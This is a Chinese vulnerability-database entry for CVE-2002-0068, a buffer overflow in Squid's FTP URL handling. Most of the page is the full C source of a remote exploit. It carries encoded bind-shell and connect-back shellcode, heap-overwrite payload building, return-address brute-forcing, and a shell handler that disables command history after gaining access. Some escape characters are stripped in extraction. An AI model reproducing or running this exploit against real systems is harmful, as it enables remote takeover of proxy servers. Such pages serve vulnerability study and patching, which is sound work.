Squid Cache FTP代理URL缓冲区溢出漏洞
漏洞ID | 1106627 | 漏洞类型 | 边界条件错误 |
发布时间 | 2002-02-21 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2002-0068 |
CNNVD-ID | CNNVD-200203-014 |
漏洞平台 | Unix | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Squid是一个运行于Linux/Unix系统下的Web服务代理程序。SquidFTP代理程序在处理FTPURL时存在缓冲区溢出问题,远程攻击者可能利用这个漏洞对服务器程序实施拒绝服务攻击。通过发送一个特别构造的ftp://URL给Squid服务器程序,可能导致服务器程序崩溃,需要手工重启才能恢复功能。这个漏洞也有可能导致在服务器上以Squid进程的身份执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/4148/info
A buffer overflow exists in the Squid proxy server's FTP URL handling.
If a user has the ability to use the Squid process to proxy FTP requests, it may be possible for the user make a malicious request. By sending a custom-crafted ftp:// URL through the squid proxy, it is possible to crash the server, requiring manual restart to resume normal operation.
This problem could also be exploited to allow the execution of code with the privileges of the Squid process, typically 'nobody'.
/**
** *OLD* *OLD* *OLD* *OLD**OLD* *OLD**OLD* *OLD**OLD* *OLD**OLD* *OLD*
**
** linux/x86 2.0 <= squid <= 2.4.DEVEL4 remote exploit (c) gunzip
**
** to compile type 'make squidx'
**
** Version 2.4STABLE(*) are vulnerable too but you have to play with
** USERLEN, NOPNUM, PASSLEN values to get exploit works (because of the
** different memory layout). Read below how to write new targets.
**
** This is however a rare exploitable bug because
**
** - Squid dies every time you overflow it and you have to wait > 10 sec
** - You can't bruteforce too much or squid will rest in peace forever
** - You MUST have the rights (acl) to use ftp proxying (not in default conf)
** - Address differs alot (return addresses) from distro to distro
** - Victim host must have an ftp server running to connect to
** - Yes, you can change the host who runs ftp server but in this way
** you mess up the align so the exploit won't work (have to fix this)
**
** I'll put new versions if I've time on
** http://members.xoom.it/gunzip/
**
** comments to gunzip@ircnet - mAilto: <[email protected]>
**
** TODO: check align against host field, make real targets
**
** Version 0.4
**
** kisses to tankie
** greets: arcangelo, jestah, sorbo, and daphiel for testing
**
** *OLD* *OLD* *OLD* *OLD**OLD* *OLD**OLD* *OLD* *OLD* *OLD* *OLD* *OLD*
**/
/**
** Here are the young men, well where have they been ?
**/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <getopt.h>
char inetd_shellcode[] =
/*
* binds an inetd shell on port 5002 (lsd-pl.net + s-poly by zillion)
*/
"x4bxebx11x5ex31xc9xb1x81x80x6cx0exffxd4x80xe9"
"x01x75xf6xebx05xe8xeaxffxffxffxbfxf6x2dx05x94"
"x24x3cx03x03x47x3cx3cx03x36x3dx42x5dxb7x24x3a"
"x3cx01x37x5dxbbx24x25x2bx27x5dxb5x6dx84xdfxa1"
"x54xbcxadxd3xd3xd3x39x37x3cx43xf4x46x3ax39xf4"
"x47x48x46x39x35x41xf4x48x37x44xf4x42x43x4bx35"
"x3dx48xf4x46x43x43x48xf4x03x36x3dx42x03x47x3c"
"xf4x47x3cxf4x01x3dx12x03x48x41x44x03x02x4cxf4"
"x0fx03x49x47x46x03x47x36x3dx42x03x3dx42x39x48"
"x38xf4x03x48x41x44x03x02x4cx0fx39x37x3cx43xf4"
"x4dx39x35x3c";
char forking_bind[] =
/*
* by eSDee - www.netric.org, encoded with s-poly by zillion
*/
"x57x5fxebx11x5ex31xc9xb1xc8x80x44x0exffx2bx49"
"x41x49x75xf6xebx05xe8xeaxffxffxffx06x95x06xb0"
"x06x9ex26x86xdbx26x86xd6x26x86xd7x26x5exb6x88"
"xd6x85x3bxa2x55x5ex96x06x95x06xb0x25x25x25x3b"
"x3dx85xc4x88xd7x3bx28x5exb7x88xe5x28x88xd7x27"
"x26x5ex9fx5exb6x85x3bxa2x55x06xb0x0ex98x49xda"
"x06x95x15xa2x55x06x95x25x27x5exb6x88xd9x85x3b"
"xa2x55x5exacx06x95x06xb0x06x9ex88xe6x86xd6x85"
"x05xa2x55x06x95x06xb0x25x25x2cx5exb6x88xdax85"
"x3bxa2x55x5ex9bx06x95x06xb0x85xd7xa2x55x0ex98"
"x4ax15x06x95x5exd0x85xdbxa2x55x06x95x06x9ex5e"
"xc8x85x14xa2x55x06x95x16x85x14xa2x55x06x95x16"
"x85x14xa2x55x06x95x25x3dx04x04x48x3dx3dx04x37"
"x3ex43x5exb8x60x29xf9xddx25x28x5exb6x85xe0xa2"
"x55x06x95x15xa2x55x06x95x5exc8x85xdbxa2x55xc0"
"x6e";
#define IP "x7fx01x01x01" /* 127.1.1.1 */
#define DPORT "x99x99" /* 39321 */
char connectback_shellcode[] =
/*
* by gloomy - www.netric.org
*/
"x31xc0xb0x02xcdx80x31xdbx39xd8x75x54"
"x50x40x50x40x50x89xe1x43xb0x66xcdx80"
"x4bx53x53x68" IP "x66x68" DPORT "xb3x02"
"x66x53x89xe2xb3x10x53x52x50x89xe1xb3"
"x03xb0x66xcdx80x31xc9x39xc1x75x23xb1"
"x02xb0x3fxcdx80x49x75xf9xb0x3fxcdx80"
"x50x68x2fx2fx73x68x68x2fx62x69x6ex89"
"xe3x50x53x89xe1x99xb0x0bxcdx80x31xc0"
"x40xcdx80";
#define CONNECT_BACK 0x1
#define CONNECT_TO 0x10
#define IP_OFFSET 28
#define PORT_OFFSET 34
struct hits
{
char * desc ;
char * code ;
unsigned short flag ;
unsigned short port ;
} ht[]=
{
{ "forking bind shellcode (45295)", forking_bind,
CONNECT_TO, 45295 },
{ "binds a shell via inetd (5002)", inetd_shellcode,
CONNECT_TO, 5002 },
{ "connects back on supplied host (39321)", connectback_shellcode,
CONNECT_BACK, 39321 },
{ NULL, 0, 0 }
};
#define TIMEOUT 0x5
#ifndef INADDR_NONE
#define INADDR_NONE 0xffffffff
#endif
#ifndef INADDR_ANY
#define INADDR_ANY 0x00000000
#endif
#ifdef DEBUG
#define debug(x...) printf(x)
#else
#define debug(x...)
#endif
/**
** a little rip from teso fmtlib
**/
#define OCT( b0, b1, b2, b3, addr ) {
b0 = (addr >> 24) & 0xff;
b1 = (addr >> 16) & 0xff;
b2 = (addr >> 8) & 0xff;
b3 = (addr ) & 0xff;
}
void shell( int fd )
{
int rd ;
fd_set rfds;
static char buff[ 1024 ];
char INIT_CMD[] = "unset HISTFILE; echo; id; uname -a;n";
if (write(fd, INIT_CMD, strlen( INIT_CMD )) < strlen(INIT_CMD)) {
fprintf(stderr,"[-] Error sending evil commands");
exit( EXIT_FAILURE );
}
while(1) {
FD_ZERO( &rfds );
FD_SET(0, &rfds);
FD_SET(fd, &rfds);
if(select(fd+1, &rfds, NULL, NULL, NULL) < 1) {
perror("[-] Select");
exit( EXIT_FAILURE );
}
if( FD_ISSET(0, &rfds) ) {
if( (rd = read(0, buff, sizeof(buff))) < 1) {
perror("[-] Read");
exit( EXIT_FAILURE );
}
if( write(fd,buff,rd) != rd) {
perror("[-] Write");
exit( EXIT_FAILURE );
}
}
if( FD_ISSET(fd, &rfds) ) {
if( (rd = read(fd, buff, sizeof(buff))) < 1) {
exit( EXIT_SUCCESS );
}
write(1, buff, rd);
}
}
}
unsigned long resolve( char * host )
{
unsigned long rev ;
struct hostent * he ;
if (( rev = inet_addr( host )) != INADDR_NONE )
{
return rev ;
}
if ( (he = gethostbyname( host )) == NULL )
{
perror("[-] Gethostbyname");
return -1;
}
else
{
return ((struct in_addr *)(he->h_addr))->s_addr ;
}
}
int connect_to_host( unsigned long ip, unsigned short port )
{
int ret, flags, s ;
struct sockaddr_in server ;
memset( &server, 0x0, sizeof(server) );
server.sin_port = htons ( port );
server.sin_family = AF_INET ;
server.sin_addr.s_addr = ip ;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1 ) {
perror("[-] Socket");
return -1 ;
}
/**
** sets non blocking socket and connects, ripped somewhere
**/
if ((flags = fcntl (s, F_GETFL, 0)) == -1 ) {
close( s );
return -1;
}
if (fcntl(s, F_SETFL, flags | O_NONBLOCK) == -1) {
close( s );
return -1;
}
ret = connect(s, (struct sockaddr *)&server, sizeof(server));
if ( ret < 0 )
{
if ( errno != EINPROGRESS ) {
close( s );
return -1;
}
else
{
int n ;
struct timeval tv = { TIMEOUT, 0 };
fd_set rset, wset;
FD_ZERO( &rset );
FD_ZERO( &wset );
FD_SET( s, &rset );
FD_SET( s, &wset );
if ((n = select( s + 1, &rset, &wset, NULL, &tv)) == -1 ) {
perror("[-] Select");
return -1;
}
/**
** handles timeout
**/
if (n == 0) {
close( s );
fprintf(stderr,"[-] Timeoutn");
return -1;
}
if (FD_ISSET( s, &rset ) || FD_ISSET( s, &wset ))
{
int error = 0 ;
int len = sizeof( error );
if (getsockopt(s, SOL_SOCKET, SO_ERROR, &error, &len) == -1) {
perror("[-] Getsockopt");
return -1;
}
if (error != 0) {
debug("[*] SO_ERROR != 0n");
return -1;
}
}
else
{
return -1 ;
}
}
}
/**
** restores flags and returns
**/
if ( fcntl(s, F_SETFL, flags) == -1 )
return -1;
else
return s;
}
size_t net_write( int fd, char * buf, size_t size )
{
struct timeval tv = { TIMEOUT, 0 };
fd_set wfds ;
int ret ;
FD_ZERO( &wfds );
FD_SET( fd, &wfds );
if ( (ret = select( fd+1, NULL, &wfds, NULL, &tv )) == -1 ) {
perror("[-] Select");
exit( EXIT_FAILURE );
}
if ( ret == 0 ) {
close( fd );
fprintf(stderr,"[-] Timeoutn");
exit( EXIT_FAILURE );
}
if ( FD_ISSET( fd, &wfds ) )
{
return( write( fd, buf, size ) );
}
else
{
fprintf(stderr,"[-] Error in sending datan");
exit( EXIT_FAILURE );
}
}
size_t net_read( int fd, char * buf, size_t size )
{
struct timeval tv = { TIMEOUT, 0 };
fd_set rfds ;
int ret ;
FD_ZERO( &rfds );
FD_SET( fd, &rfds );
if ( (ret = select( fd+1, NULL, &rfds, NULL, &tv )) == -1 ) {
perror("[-] Select");
exit( EXIT_FAILURE );
}
if ( ret == 0 ) {
close( fd );
fprintf(stderr,"[-] Timeoutn");
exit( EXIT_FAILURE );
}
if ( FD_ISSET( fd, &rfds ) )
{
return( read( fd, buf, size ) );
}
else
{
fprintf(stderr,"[-] Error in sending datan");
exit( EXIT_FAILURE );
}
}
char * make_connback_shellcode( const char * hellcode,
unsigned long ip,
unsigned short port,
int ip_offset,
int port_offset )
{
/**
** ip and port MUST be in host byte order
**/
char a, b, c, d;
char * hell = (char *)strdup( hellcode );
fflush( stderr );
if ( !hell ) {
fprintf( stderr, "[-] Out of memory !n");
exit( EXIT_FAILURE );
}
debug("[*] Using ip=0x%.8x port=%dn", (unsigned int)ip, port );
/**
** can't contain 0x0a and 0x0d too !!
**/
OCT( a, b, c, d, ip );
if ( ( !a || !b || !c || !d ) ||
(( a == 0xa )||( b == 0xa )||( c == 0xa )|| ( d == 0xa ))||
(( a == 0xd )||( b == 0xd )||( c == 0xd )|| ( d == 0xd )) )
{
fprintf(stderr, "[-] Ip contains invalid byte(s) that can't be in the shellcoden"
"[-] Change ip/shellcode and retry.n");
exit( EXIT_FAILURE );
}
if ( ( !(port & 0xff ) || !(port & 0xff00 )) ||
( (( port & 0xff )== 0xa ) || (( port & 0xff00 )== 0xa )) ||
( (( port & 0xff )== 0xd ) || (( port & 0xff00 )== 0xd )) )
{
fprintf(stderr, "[-] Port contains invalid byte(s) that can't be in the shellcoden"
"[-] Change bindport/shellcode and retry.n");
exit( EXIT_FAILURE );
}
*(unsigned long *)( hell + ip_offset ) = htonl( ip );
*(unsigned short *)( hell + port_offset ) = htons( port );
return hell;
}
/**
** if you have time to add real targets send me them,
** I'll return to you the xpl with all new targets and fixes
**/
#define NOPNUM 800
#define USERLEN 11
#define PASSLEN 28
#define URLLEN 24
#define SMARTJUMP "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#define MASK 0x7
#define BRUTE_START ( 0x346000 + tg[n].retloc )
#define BRUTE_END ( 0x366000 + tg[n].retloc )
#define PORT 3128
#define DELAY 12
#define request2size(req) ( req += (sizeof( size_t ) + MASK) &~ MASK )
/**
** retloc :
** echo 0x`objdump -R /usr/sbin/squid | grep write | awk '{print $1}'`
**
** retaddr:
** gdb squid `pidof squid` then on another console run the exploit
** wait for squid to segfault, if it segfaults to an address like
** 0x08041XXX then you just have to look for nopcode just at
** 0xRETLOC + 346000 (nops look like 0xeb27eb27)
**
** ie. if your retloc is 0x080bb1f8 then just do something like
** (gdb) x/100000x 0x080bb1f8+345000
**
** padding:
** if squid does not segfault on an address like 0x08XXXXXX
** then you have to play with lenght of password, user or url
**/
struct options
{
char * desc ;
unsigned long retaddr ;
unsigned long retloc ;
} tg[]=
{
{ "2.4.DEVEL4 - Debian 3.0 from src" , 0x08401ba4, 0x080bb1f8 },
{ "2.3STABLE5 - Debian 3.0 from src" , 0x0841982c, 0x080b80a8 },
{ NULL, 0, 0 }
};
void usage( char * a )
{
fprintf( stderr, "Usage: %s -v victim [options]nn"
"-vtvictim ip or fqhnn"
"-ptport to connect to (default 3128)n"
"-ftdoes not check if host is vulnerable (forces exploit)n"
"-jtjust check if host is vulnerablen"
"-itip address for connect back shellcoden"
"-Ptport of connect back shellcoden"
"-ttone of the targets (for a list type -t X)n"
"-ctone of the shellcodes (for a list type -c X)n"
"-btbruteforce moden"
"-ststep for bruteforcen"
"-dtdelay between attacks (12 secs default)n"
"-ntnumber of nops (try 800, 1024, 1500, 2068)n"
"-rtreturn address (shellcode address)n"
"-gtaddress to be overwrittennn", a );
exit( EXIT_FAILURE );
}
void show_target_list()
{
int i;
fprintf( stderr, "[+] TARGETS:nn");
for (i = 0 ; tg[ i ].desc ; i++ )
fprintf ( stderr, " %d - %sn", i, tg[ i ].desc);
printf("n");
exit( EXIT_FAILURE );
}
void show_code_list()
{
int i;
fprintf( stderr, "[+] SHELLCODESnn");
for (i = 0 ; ht[ i ].desc ; i++ )
fprintf ( stderr, " %d - %sn", i, ht[ i ].desc );
printf("n");
exit( EXIT_FAILURE );
}
int squid_check_if_vuln( unsigned long ip, char * host )
{
int s ;
char buf[ 1024 ];
char pad[ 64 ];
memset( buf, 0x0, sizeof(buf) );
memset( pad, 0x7e, sizeof(pad) );
pad[ 63 ] =0;
snprintf( buf, sizeof(buf) - 1,
"GET ftp://%s:%s@%s/ HTTP/1.0rnrn",
pad, pad, host );
buf[ 1024 - 1 ] =0;
if ( (s = connect_to_host( ip, 3128 )) == -1 )
return 0;
if (net_write( s, buf, strlen(buf) ) == strlen(buf)) {
memset( buf, 0x0, sizeof(buf) );
if( net_read( s, buf, sizeof(buf)) > 0 ) {
close( s );
return 0;
}
else {
close( s );
return 1;
}
}
close( s );
return 0;
}
/**
** every leeto exploit MUST have dots in it
**/
void wait_dots( int s )
{
int i;
fprintf( stdout, "[+] Sleeping %d secs to let squid restart", s);
for ( i=0; i <= s ; i++ )
{
fflush( stdout );
fprintf(stdout, ".");
sleep( 1 );
}
fprintf( stdout, "n" );
}
int main(int argc, char *argv[])
{
unsigned long ip = 0x7f000001,
local_ip = 0x0,
retaddr = 0x0;
unsigned int len, i,
step = NOPNUM - 256,
nopnum = NOPNUM,
delay = DELAY;
unsigned short port = PORT ;
int opt, s, n =0, c =0, brute =0, force =0;
char user [ 128 ];
char pass [ 128 ];
char url [ 128 ];
char evil [ 4096 ];
char nops [ NOPNUM ];
char * t ;
char * host = "0.0.0.0" ;
char * victim = "127.0.0.1";
fprintf(stdout, "nlinux/x86 remote exploit against squid <= 2.4.STABLE3 by gunzipnn");
if ( argc < 3 )
usage( argv[0] );
while ((opt = getopt(argc, argv, "n:d:i:P:jfp:c:t:v:r:g:bs:h")) != EOF) {
switch(opt)
{
case 'd': delay = atoi(optarg); break;
case 'n': nopnum = atoi(optarg); break;
case 'i': local_ip = inet_addr(optarg); break;
case 'P': ht[c].port = atoi(optarg); break;
case 'f': force=1; break;
case 'j': force=-1; break;
case 'p': port = atoi(optarg) ;
case 'c': if ( *optarg == 'X' ) show_code_list();
else c = atoi(optarg); break;
case 't': if ( *optarg == 'X' ) show_target_list();
else n = atoi(optarg); break;
case 'v': victim = strdup( optarg ); break ;
case 'r': tg[n].retaddr = strtoul( optarg, NULL, 16 ); break ;
case 'g': tg[n].retloc = strtoul( optarg, NULL, 16 ); break ;
case 'b': brute=1; break;
case 's': step=atoi(optarg); break;
case 'h': default: usage( "./squidx" ); break;
}
}
if ( ht[c].port > 65535 || ht[c].port < 1 ) {
fprintf(stderr, "[-] Not valid port for connect back coden");
return -1;
}
if ( ht[c].flag & CONNECT_BACK ) {
if ( !local_ip || local_ip == -1 ) {
fprintf(stderr,"[-] You must supply a valid ip for connect back shellcode.n");
return -1;
}
ht[c].code = make_connback_shellcode( ht[c].code,
ntohl( local_ip ),
ht[c].port,
IP_OFFSET,
PORT_OFFSET
);
}
if ( (ip = resolve( victim )) == -1 ) {
fprintf(stderr, "[-] Cannot resolve victim ipn");
return -1;
}
if ( !force ) {
if ( squid_check_if_vuln( ip, host ) )
fprintf(stdout, "[+] Host seems vuln !n");
else {
fprintf(stderr, "[-] Host seems not vuln, sorry.n");
return -1;
}
if ( force == -1 )
return 1;
wait_dots( 12 );
}
fprintf(stdout,"[+] Target %sn", tg[n].desc);
fprintf(stdout,"[+] Host is %sn", victim );
/**
** this is for align and overflow
**/
memset( user, 0x7e, USERLEN );
user[ USERLEN ] = 0;
memset( pass, 0x7e, PASSLEN );
pass[ PASSLEN ] = 0 ;
len = 64 + strlen( user ) + strlen( pass ) + strlen( host ) + URLLEN;
t = (char *)malloc( len );
memset( evil, 0x00, sizeof(evil));
memset( nops, 0xeb, sizeof(nops));
memset( url, 0x41, sizeof(url));
/**
** that's because 0x27 act as a nop
**/
for ( i=1; i < sizeof(nops) ; i+=2 )
nops[ i ] = 0x27 ;
nops[ nopnum - strlen(ht[c].code) - 8 ] = 0 ;
snprintf( evil, sizeof(evil)-1, "Accept: %s%s%srnrn", nops, SMARTJUMP, ht[c].code);
for ( retaddr=(brute ? BRUTE_START : tg[n].retaddr ); retaddr <= (brute ? BRUTE_END : tg[n].retaddr ); reta
ddr += step )
{
memset( t, 0x0, len );
fprintf(stdout,"[+] Using retaddr=0x%.8x retloc=0x%.8x code=%d step=%dn",
(u_int)retaddr, (u_int)tg[n].retloc,
strlen(ht[c].code), step);
*(long *)&url[0] = 0x4142432f ; /* dummy */
*(long *)&url[4] = 0xfffffffc ; /* prevsize */
*(long *)&url[8] = 0xfffffffc ; /* size field */
*(long *)&url[12] = 0xdeadbeef ; /* dummy */
*(long *)&url[16] = tg[n].retloc - 12 ; /* fd */
*(long *)&url[20] = retaddr ; /* bk */
url[ URLLEN ] = 0 ;
debug("[*] Using host=%d user=%d url=%d pass=%dn",
strlen(host), strlen(user),
strlen(url), strlen(pass));
debug("[*] Using buffer_len=%d real_malloced_size=%dn",
len, request2size( len ));
strcat( t, "GET " );
strcat( t, "ftp://" );
strcat( t, user );
strcat( t, ":" );
strcat( t, pass );
strcat( t, "@" );
strcat( t, host );
strcat( t, url );
strcat( t, " HTTP/1.0rn" );
debug("[*] Using string=%d evil=%dn", strlen(t), strlen(evil));
if ( (s = connect_to_host( ip, 3128 )) == -1 ) {
fprintf(stderr, "[-] Could not connect to host %sn", victim );
return -1;
}
net_write( s, t, strlen(t) );
net_write( s, evil, strlen(evil) );
if (( brute ) && !(brute++ % 5) )
wait_dots( 22 );
else
wait_dots( 12 );
close( s );
sleep( 1 );
if ( ht[c].flag & CONNECT_TO )
{
int y = connect_to_host( ip, ht[c].port );
fprintf( stdout, "[+] Trying connecting to the backdoorn");
if ( y > 0 ) shell( y );
}
fprintf(stdout, "[+] I did not work.n");
}
return 1;
}
|参考资料
来源:REDHAT
名称:RHSA-2002:029
链接:http://www.redhat.com/support/errata/RHSA-2002-029.html
来源:www.squid-cache.org
链接:http://www.squid-cache.org/Versions/v2/2.4/bugs/
来源:BID
名称:4148
链接:http://www.securityfocus.com/bid/4148
来源:OSVDB
名称:5378
链接:http://www.osvdb.org/5378
来源:SUSE
名称:SuSE-SA:2002:008
链接:http://www.novell.com/linux/security/advisories/2002_008_squid_txt.html
来源:MANDRAKE
名称:MDKSA-2002:016
链接:http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-016.php
来源:XF
名称:squid-ftpbuildtitleurl-bo(8258)
链接:http://www.iss.net/security_center/static/8258.php
来源:CALDERA
名称:CSSA-2002-010.0
链接:http://www.caldera.com/support/security/advisories/CSSA-2002-010.0.txt
来源:BUGTRAQ
名称:20020222TSLSA-2002-0031-squid
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101443252627021&w;=2
来源:BUGTRAQ
名称:20020222Squidbufferoverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101440163111826&w;=2
来源:BUGTRAQ
名称:20020221SquidHTTPProxySecurityUpdateAdvisory2002:1
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101431040
相关推荐: Microburst uDirectory Remote Command Execution Vulnerability
Microburst uDirectory Remote Command Execution Vulnerability 漏洞ID 1103145 漏洞类型 Input Validation Error 发布时间 2001-06-18 更新时间 2001-06…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666